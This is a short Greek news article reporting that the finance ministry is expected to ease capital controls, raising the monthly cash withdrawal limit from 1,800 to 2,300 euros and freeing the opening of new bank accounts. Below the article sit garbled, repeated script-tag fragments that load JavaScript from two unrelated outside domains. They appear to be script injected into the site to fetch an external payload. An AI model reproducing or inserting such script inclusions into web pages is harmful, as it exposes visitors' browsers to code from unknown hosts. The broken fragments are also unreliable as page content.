Νέα χαλάρωση των capital control – Πόσο αυξάνεται το όριο αναλήψεων

 Αποτέλεσμα εικόνας για capital control

Το υπουργείο Οικονομικών με Πράξη Νομοθετικού Περιεχομένου αναμένεται να χαλαρώσει περαιτέρω τους περιορισμούς στην κίνηση κεφαλαίων που επιβλήθηκαν τον Ιούνιο του 2015.

Ειδικότερα, αναμένεται να αυξηθεί το μηναίο ποσό αναλήψεων κατά 500 ευρώ και την απελευθέρωση του ανοίγματος νέων τραπεζικών λογαριασμών.

Η νέα χαλάρωση των capital controls θα επιτρέπει στους πελάτες των τραπεζών να προχωρούν στη σωρευτική ανάληψη ποσού 2.300 ευρώ τον μήνα, από 1.800 ευρώ που ισχύει σήμερα. Παράλληλα, θα είναι ελεύθεροι να ανοίξουν νέο τραπεζικό λογαριασμό, ανεξάρτητα αν έχουν ήδη λογαριασμό σε μία ή περισσότερες τράπεζες.

Σύμφωνα με το «Έθνος» που επικαλείται τραπεζικές και κυβερνητικές πηγές, οι οποίες επιβεβαιώνουν το γεγονός, η κίνηση σηματοδοτεί την αύξηση της εμπιστοσύνης στην πορεία της ελληνικής οικονομίας. Οι ίδιες πηγές αναφέρουν πως η νέα χαλάρωση των capital controls και η τάση επιστροφής χρημάτων στις τράπεζες θα ενισχυθεί.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>

Leave a Reply

Your email address will not be published. Required fields are marked *

*